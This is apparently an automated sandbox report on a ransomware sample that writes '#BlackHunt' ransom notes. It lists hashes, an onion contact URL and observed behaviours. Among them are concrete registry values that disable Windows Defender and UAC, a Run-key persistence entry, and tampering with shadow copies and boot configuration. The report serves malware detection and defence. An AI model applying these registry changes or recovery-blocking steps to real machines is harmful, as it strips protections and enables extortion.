Analysis
-
max time kernel
204s -
max time network
163s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 22:37
Static task
static1
Behavioral task
behavioral1
Sample
18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe
Resource
win10v2004-20231215-en
General
-
Target
18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe
-
Size
707KB
-
MD5
4489964d7a00728f7b46c41fced518cd
-
SHA1
7731adc101012b6f0207cb04aad288bf4444f679
-
SHA256
18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285
-
SHA512
a0c0d6307c1ebfe93275addeb501b57730264e6fdde8b1b296714df66dc9b6134e7237303452bd836092862182553891755670b2c1767044782a93364a50524d
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1p8Gvnh:6uaTmkZJ+naie5OTamgEoKxLWU4h
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2060 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1800 bcdedit.exe 1564 bcdedit.exe -
Renames multiple (104) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2720 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\L: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\R: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\M: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\V: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\S: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\U: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\P: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\W: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\T: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\O: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\J: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\K: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\Z: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\Q: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\N: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\H: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\X: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\B: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\E: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\Y: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened (read-only) \??\G: 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIconSubpictur.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_SelectionSubpicture.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_ButtonGraphic.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_Private.key 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_Private.key 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_Private.key 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_ReadMe.hta 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\#BlackHunt_Private.key 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#BlackHunt_ReadMe.hta 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\1047x576black.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\#BlackHunt_ReadMe.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\#BlackHunt_ReadMe.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_videoinset.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\pushplaysubpicture.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.hta 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_SelectionSubpicture.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#BlackHunt_ReadMe.hta 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#BlackHunt_ReadMe.hta 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\offset.ax 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#BlackHunt_ReadMe.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#BlackHunt_Private.key 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\#BlackHunt_Private.key 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\heart_glass_Thumbnail.bmp 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-imageMask.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-next-static.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_ButtonGraphic.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_glass_Thumbnail.bmp 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1328 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1880 vssadmin.exe 1668 vssadmin.exe 2136 vssadmin.exe 1648 vssadmin.exe 2300 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe Token: SeRestorePrivilege 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe Token: SeBackupPrivilege 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe Token: SeTakeOwnershipPrivilege 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe Token: SeAuditPrivilege 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe Token: SeSecurityPrivilege 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe Token: SeIncBasePriorityPrivilege 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe Token: SeBackupPrivilege 1968 wbengine.exe Token: SeRestorePrivilege 1968 wbengine.exe Token: SeSecurityPrivilege 1968 wbengine.exe Token: SeBackupPrivilege 2636 vssvc.exe Token: SeRestorePrivilege 2636 vssvc.exe Token: SeAuditPrivilege 2636 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2520 wrote to memory of 1980 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 30 PID 2520 wrote to memory of 1980 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 30 PID 2520 wrote to memory of 1980 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 30 PID 2520 wrote to memory of 1980 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 30 PID 2520 wrote to memory of 2244 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 31 PID 2520 wrote to memory of 2244 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 31 PID 2520 wrote to memory of 2244 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 31 PID 2520 wrote to memory of 2244 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 31 PID 2520 wrote to memory of 1672 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 33 PID 2520 wrote to memory of 1672 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 33 PID 2520 wrote to memory of 1672 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 33 PID 2520 wrote to memory of 1672 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 33 PID 2520 wrote to memory of 1896 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 36 PID 2520 wrote to memory of 1896 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 36 PID 2520 wrote to memory of 1896 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 36 PID 2520 wrote to memory of 1896 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 36 PID 2520 wrote to memory of 1040 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 37 PID 2520 wrote to memory of 1040 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 37 PID 2520 wrote to memory of 1040 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 37 PID 2520 wrote to memory of 1040 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 37 PID 2520 wrote to memory of 1016 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 39 PID 2520 wrote to memory of 1016 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 39 PID 2520 wrote to memory of 1016 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 39 PID 2520 wrote to memory of 1016 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 39 PID 2520 wrote to memory of 312 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 40 PID 2520 wrote to memory of 312 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 40 PID 2520 wrote to memory of 312 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 40 PID 2520 wrote to memory of 312 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 40 PID 2520 wrote to memory of 2612 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 41 PID 2520 wrote to memory of 2612 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 41 PID 2520 wrote to memory of 2612 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 41 PID 2520 wrote to memory of 2612 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 41 PID 2520 wrote to memory of 1612 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 44 PID 2520 wrote to memory of 1612 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 44 PID 2520 wrote to memory of 1612 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 44 PID 2520 wrote to memory of 1612 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 44 PID 2520 wrote to memory of 2824 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 46 PID 2520 wrote to memory of 2824 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 46 PID 2520 wrote to memory of 2824 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 46 PID 2520 wrote to memory of 2824 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 46 PID 2520 wrote to memory of 2792 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 47 PID 2520 wrote to memory of 2792 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 47 PID 2520 wrote to memory of 2792 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 47 PID 2520 wrote to memory of 2792 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 47 PID 2520 wrote to memory of 2816 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 49 PID 2520 wrote to memory of 2816 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 49 PID 2520 wrote to memory of 2816 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 49 PID 2520 wrote to memory of 2816 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 49 PID 2520 wrote to memory of 1920 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 50 PID 2520 wrote to memory of 1920 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 50 PID 2520 wrote to memory of 1920 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 50 PID 2520 wrote to memory of 1920 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 50 PID 2520 wrote to memory of 1140 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 52 PID 2520 wrote to memory of 1140 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 52 PID 2520 wrote to memory of 1140 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 52 PID 2520 wrote to memory of 1140 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 52 PID 2520 wrote to memory of 1328 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 149 PID 2520 wrote to memory of 1328 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 149 PID 2520 wrote to memory of 1328 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 149 PID 2520 wrote to memory of 1328 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 149 PID 2520 wrote to memory of 1348 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 56 PID 2520 wrote to memory of 1348 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 56 PID 2520 wrote to memory of 1348 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 56 PID 2520 wrote to memory of 1348 2520 18403ad1d1e83ebe574d0db2a6595520d5be2a0c1d3ccae074a66a36df9bd285.exe 56 -
